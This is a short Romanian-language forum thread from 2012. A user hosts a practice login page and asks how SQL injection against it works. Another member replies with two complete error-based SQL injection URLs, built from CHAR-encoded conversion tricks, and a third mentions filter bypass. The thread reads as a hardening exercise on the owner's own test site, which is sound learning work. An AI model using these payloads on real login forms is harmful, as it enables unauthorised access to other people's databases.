yoyois Posted June 29, 2012 Report Share Posted June 29, 2012 Login XVa rog si metoda/sintaxa. Explicati putin cumn functioneaza.PS: Stiu ca va bat la cap cu chestii deastea... Quote Link to comment Share on other sites More sharing options...
cLw7hp Posted June 29, 2012 Report Share Posted June 29, 2012 http://mytest-php.web44.net/login.php?pass=%27%2B%20%28select+convert%28int,CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29%20%2B%27&user=3 Quote Link to comment Share on other sites More sharing options...
yoyois Posted June 29, 2012 Author Report Share Posted June 29, 2012 Mdah ... i-am dat stripslashes(); acum e prea usor ...Exista vreo cale sa ingreunez putin injectia ? Quote Link to comment Share on other sites More sharing options...
tromfil Posted June 29, 2012 Report Share Posted June 29, 2012 SQL filter bypass Quote Link to comment Share on other sites More sharing options...
cLw7hp Posted June 29, 2012 Report Share Posted June 29, 2012 http://mytest-php.web44.net/login.php?pass=3&user='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' Quote Link to comment Share on other sites More sharing options...